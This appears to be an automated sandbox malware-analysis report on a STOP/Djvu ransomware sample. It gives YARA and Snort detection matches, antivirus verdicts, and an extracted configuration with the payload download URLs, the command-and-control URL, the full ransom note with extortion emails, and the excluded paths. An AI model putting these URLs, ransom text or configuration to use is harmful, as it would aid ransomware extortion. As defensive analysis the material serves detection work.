3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Click to see the 25 entries

Snort Signatures

ETPRO TROJAN STOP Ransomware CnC Activity - Source IP: 192.168.2.4 - Destination IP: 199.59.242.150

Timestamp:	192.168.2.4199.59.242.15049734802833438 01/26/24-01:36:17.138983
SID:	2833438
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.4 - Destination IP: 199.59.242.150

Timestamp:	192.168.2.4199.59.242.15049732802020826 01/26/24-01:36:00.285049
SID:	2020826
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.4 - Destination IP: 199.59.242.150

Timestamp:	192.168.2.4199.59.242.15049732802036333 01/26/24-01:36:00.285049
SID:	2036333
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://colisumy.com/dl/build2.exe$run	URL Reputation: Label: malware
Source: http://zexeq.com/files/1/build3.exe$run	URL Reputation: Label: malware
Source: http://zexeq.com/raud/get.php	URL Reputation: Label: malware
Source: http://colisumy.com/dl/build2.exe	URL Reputation: Label: malware
Source: http://zexeq.com/raud/get.phpep	URL Reputation: Label: malware
Source: http://zexeq.com/files/1/build3.exe	URL Reputation: Label: malware
Source: http://zexeq.com/raud/get.phpP	Avira URL Cloud: Label: malware
Source: http://colisumy.com/dl/build2.exerun00.Y	Avira URL Cloud: Label: malware
Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true	Avira URL Cloud: Label: malware
Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	Avira URL Cloud: Label: malware
Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637V	Avira URL Cloud: Label: malware
Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637i	Avira URL Cloud: Label: malware
Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	Avira URL Cloud: Label: malware
Source: http://zexeq.com/files/1/build3.exerun8	Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack

Malware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-tnzomMj6HU\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0717JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windo

Multi AV Scanner detection for domain / URL

Source: zexeq.com	Virustotal: Detection: 20%	Perma Link
Source: colisumy.com	Virustotal: Detection: 19%	Perma Link
Source: http://zexeq.com/raud/get.phpP	Virustotal: Detection: 17%	Perma Link
Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	Virustotal: Detection: 15%	Perma Link
Source: http://zexeq.com/files/1/build3.exerun8	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Virustotal: Detection: 76%			Perma Link

Multi AV Scanner detection for submitted file

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	ReversingLabs: Detection: 86%
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Virustotal: Detection: 76%			Perma Link

Machine Learning detection for sample

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00481178 CryptDestroyHash,CryptReleaseContext,	0_2_00481178
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	0_2_0047E870
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047EA51 CryptDestroyHash,CryptReleaseContext,	0_2_0047EA51
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	0_2_0047EAA0
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047EC68 CryptDestroyHash,CryptReleaseContext,	0_2_0047EC68
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00480FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	0_2_00480FC0
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0047E870
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0047EAA0
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_00480FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	2_2_00480FC0
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_00481178 CryptDestroyHash,CryptReleaseContext,	2_2_00481178
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047EA51 CryptDestroyHash,CryptReleaseContext,	2_2_0047EA51
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047EC68 CryptDestroyHash,CryptReleaseContext,	2_2_0047EC68
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	3_2_00E2E870
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	3_2_00E2EAA0
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E30FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	3_2_00E30FC0
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E31178 CryptDestroyHash,CryptReleaseContext,	3_2_00E31178
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2EA51 CryptDestroyHash,CryptReleaseContext,	3_2_00E2EA51
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2EC68 CryptDestroyHash,CryptReleaseContext,	3_2_00E2EC68
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E31178 CryptDestroyHash,CryptReleaseContext,	4_2_00E31178
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	4_2_00E2E870
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	4_2_00E2EAA0
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2EA51 CryptDestroyHash,CryptReleaseContext,	4_2_00E2EA51
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2EC68 CryptDestroyHash,CryptReleaseContext,	4_2_00E2EC68
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E30FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	4_2_00E30FC0

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
